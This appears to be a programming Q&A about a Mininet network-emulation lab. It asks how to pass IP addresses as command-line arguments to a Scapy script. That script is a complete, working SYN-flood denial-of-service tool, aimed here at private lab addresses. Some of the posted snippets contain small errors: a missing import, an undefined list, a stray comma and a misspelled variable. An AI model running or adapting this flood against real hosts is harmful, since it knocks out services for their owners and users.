# Run a python script in Command Line and send argument to it

Tags: python, scapy, mininet

I used following python script to create a custom topology in mininet using **sudo Python My_topology.py** :

```
from mininet.topo import Topo
from mininet.node import Node
from mininet.net import Mininet
from mininet.cli import CLI
from mininet.node import RemoteController
import os
import sys

logging.getLogger().setLevel(logging.INFO)

class MyTopo (Topo):

    def __init__(self, ipBase='10.0.0.0/8'):
        Topo.__init__(self)

        global host_list
        # Add hosts and switches
        s1 = self.addSwitch('s1')

        for i in range(1, 21):
            self.addHost('h%s'%i)
            host_list.append('h%s'%i)
            self.addLink('h%s'%i, s1)

def attack():
    h1 = net.get('h1')
    h1.cmd('sudo python .../My_SYNflood_attack.py')

topo = MyTopo()
net = Mininet(topo, controller=lambda name: RemoteController(name,
              ip= '127.0.0.1', protocol= 'tcp', port= 6633), autoSetMacs= True)
net.start()
attack()
CLI(net)
net.stop()
```

As you see in attack function I used another .py script to send TCP packets from host h1 t another host. My_SYNflood_attack.py is as follow:

```
from scapy.all import *
import os
import sys
import random
import argparse
srcIP = '10.0.0.1'
dstIP = '10.0.0.10'
srcPort = 5555
dstPort = 4444

def randInt():
    x = random.randint(1000,9000)
    return x    

def SYN_Flood(srcIP,dstIP,dstPort,counter):
    total = 0
    print("Packets are sending ...")
    for x in range (0,counter):
        s_port = randInt()
        s_eq = randInt()
        w_indow = randInt()
        IP_Packet = IP ()
        IP_Packet.src = srcIP
        IP_Packet.dst = dstIP
        TCP_Packet = TCP ()
        TCP_Packet.sport = s_port
        TCP_Packet.dport = dstPort
        TCP_Packet.flags = "S"
        TCP_Packet.seq = s_eq
        TCP_Packet.window = w_indow
        send(IP_Packet/TCP_Packet, verbose=0)
        total+=1
    sys.stdout.write("\nTotal packets sent: %i\n" % total)

def main():
    SYN_Flood(srcIP, dstIP,dstPort,10)# 10 is number of packets

if __name__ == "__main__":
    main()
```

So as you see in second script I set source and destination IP address statically, now I want to send source an destination IP address from first script and call My_SYNflood_attack.py in attack function like this: **h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2 10.0.0.3')** 
How can I do it??

Comment: Why don't you just `import` the second script into your first and then create the object and call your methods.

Comment: I believe you are using system calling second script because this is remote calling. In other case you could simply use import and call `SYN_Flood` method directly. Anyway command line parameters of python script can be read from `sys.argv`. [Here](http://www.pythonforbeginners.com/argv/more-fun-with-sys-argv) are some tips how to use it. Usually it is more convinient to use [argparse](https://docs.python.org/2/library/argparse.html) module to parse command line arguments.

Comment: @Jimenemex because I want to run second script for each node individually in its cmd instead of using xterm.

Comment: @running.t I use sys.argv and it seems work correctly. thanks

Answer (score 2, accepted):

are you looking for something like this?

```
def attack():
    h1 = net.get('h1')
    h1.cmd('sudo python .../My_SYNflood_attack.py 10.0.0.2, 10.0.0.3')
```

and:

```
scrIP = sys.argv[1]
dstIP = sys.argv[2]
```

Answer (score 0):

You can use to call another python script with arguments:

```
subprocess.call(['python', '.../My_SYNflood_attack.py.py', somescript_arg1, somescript_val1,...])
```